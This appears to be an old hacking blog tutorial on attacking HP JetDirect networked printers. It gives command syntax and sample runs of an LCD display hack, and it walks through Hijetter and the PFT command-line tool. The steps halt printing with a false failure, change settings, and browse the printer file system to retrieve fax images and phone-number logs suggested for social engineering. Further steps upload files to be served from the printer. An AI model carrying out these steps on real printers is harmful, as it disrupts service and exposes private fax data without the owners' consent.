Changing the LCD display text using HPhack, IGhphack or Hijetter
This is an old hack (1997) and does not accomplish much, but it is fun! Silicosis of L0pht (sili@l0pht.com) wrote the original exploit code for *nix systems and someone else ported it to NT/2000/XP based systems. Although it's been out there for a long time, it still works on every HP printer/JetDirect box I have seen. What the HP display hack allows you to do is set the text that displays on the little LCD panel of an HP printer. It accomplishes this over the network by sending packets to a JetDirect box hooked to the printer (or built into it).
The first thing you need to do is find out the IP or hostname of the JetDirect box that services the printer. You can do this in one of at least three ways. The first way is by hitting the little test button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxs" settings, right click and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******). Once you have this information it's easy to run Silicosis ' little hack.
To run it from Windows just use the following syntax: hpnt Hostname Message
Windows Example:
Windows Example:
| C:\>hpnt npi769e71 "Irongeek" HP Display hack -- sili@l0pht.com Hostname: npi769e71 Message: Irongeek Connecting.... Sent 54 bytes C:\>hpnt 192.168.1.14 "Irongeek Also" HP Display hack -- sili@l0pht.com Hostname: 192.168.1.14 Message: Irongeek Also Connecting.... Sent 59 bytes C:\> |
If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc. The syntax is the same as the Windows version. Below is an example of how to compile and run it:
| [root@balrog root]# gcc -o hphack hp.c hp.c:28:12: warning: multi-line string literals are deprecated [root@balrog root]# ./hphack 192.168.1.14 "Irongeek" HP Display hack -- sili@l0pht.com Hostname: 192.168.1.14 Message: Irongeek Connecting.... Sent 54 bytes [root@balrog root]# |
A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can download Silicosis hack from one of these links:
I'm working on my own GUI version with extra features; its web page can be found here:
Unfortunately it's pretty buggy.
The easiest tool to use may be Hijetter by FtR of Phenoelit, which is covered in the next section.
Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL commands, and works even if a password is set (at least on my HP JetDirect 300X).You can download the binary and the source code for this app from:
Below is a screen show of Hijetter 's interface. To use Hijetter just type in the IP or host name of your JetDirect box and click the connect icon.
You should notice that a few of the icons at the bottom of the interface light up.
You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that displace on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.
1. After you have connected to the JetDirect box click the LCD Display icon.
2. Type in the message you want the printers LCD to display.
3. If you check the "Failure" radio button the printer will stop printing until someone hits the ok/continue/online button on the printer, or it's reset.
4. Click the confirm buttonand your message should now appear on the printers LCD.
1. After you have connected to the JetDirect box click the settings icon.
2. Find the environmental variable you want to change and type in the value you want to set it to, keeping in mind the limitations listed in the "Info" panel.
3. Use the assign button 
to set your change. An M should appear next to the variable you changed.
to set your change. An M should appear next to the variable you changed. 4. Click the confirm button and you're done.
and you're done.
1. After you have connected to the JetDirect box click the File System icon.
2. Use the arrows to transfer files to and from your client to the JetDirect box. Keep in mind that you can only transfer one file at a time with Hijetter.
3. The New Folder
and Delete icons
can be used for their obvious functions.
and Delete icons can be used for their obvious functions. 4. Click the confirm button and you're done.
and you're done. Look around the file system and download any files that looks interesting. Most of them don't have obvious file extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few of the things I've found by searching around this way:
| Location | What I've found |
| /saveDevice/DigitalSend/jobs | Jpegs with names like DS000848.005 that seem to be either print jobs or Faxes . |
| /FaxOut | Tif files from sent Faxes |
| /FaxIn | PCL files from received Faxes. See my NetCat and FTP tricks later for more information on how to print them. |
| /Fax/act.log | Seems to be a log of phone numbers where things have be faxed to or from. Could be useful for social engineering. |
Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:
/webserver/home/
and can be accessed from the printers web interface at:
http://192.168.1.4/hp/device/
For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed from the web with the URL:
For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed from the web with the URL:
http://192.168.1.4/hp/device/naughtylinuxgirls.avi
Feel free to put your homepage on a printer. :)
If you're a *nix or Window command line boy, don't despair. The same folks from Phenoelit have provided PFT, a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these commands:
| mkdir pjllib cd pjllib wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz tar -xzf libPJL-1.3-src.tgz make cd pft/ make |
Here is an example of what it looks like on the command line after you bring up the help page; look at all of the options:
| Irongeek:/home/adrian/pjllib/pft# ./pft PFT - PJL file transfer FX of Phenoelit Version 0.7 ($Revision: 1.8 $) pft> help quit server [hostname] port [port number] connect close env {read|print|show|set|options|changed|commit|unprotect|bruteforce} message "Display Msg" failure "Failure Msg" volumes chvol [vol:] pwd ls cd [directory] mkdir [directory] rm [file] get [file] put [local file] append [local file] [file] lpwd lcd [directory] session timeout [timeout] pause pft> |
PFT also has some limited scripting ability by piping in commands from a text file as this example shows:
| Irongeek:/home/adrian/pjllib/pft# cat mypftscript.txt server 192.168.31.213 connect ls quit Irongeek:/home/adrian/pjllib/pft# ./pft PFT - PJL file transfer FX of Phenoelit Version 0.7 ($Revision: 1.8 $) pft> Server set to 192.168.31.213 pft> Connected to 192.168.31.213:9100 Device: HP LaserJet 4100 MFP pft> 0:\ . - d .. - d PermStore - d PostScript - d PJL - d saveDevice - d cpbLog 5227 - Fax - d solution - d webServer - d FaxOut - d FaxIn - d pft> Irongeek:/home/adrian/pjllib/pft# |
Since Phenoelit provides the source code it could be an interesting project to write new automated tools for extracting information from remote JetDirect boxes.
LibreOffice
Firefox
No comments:
Post a Comment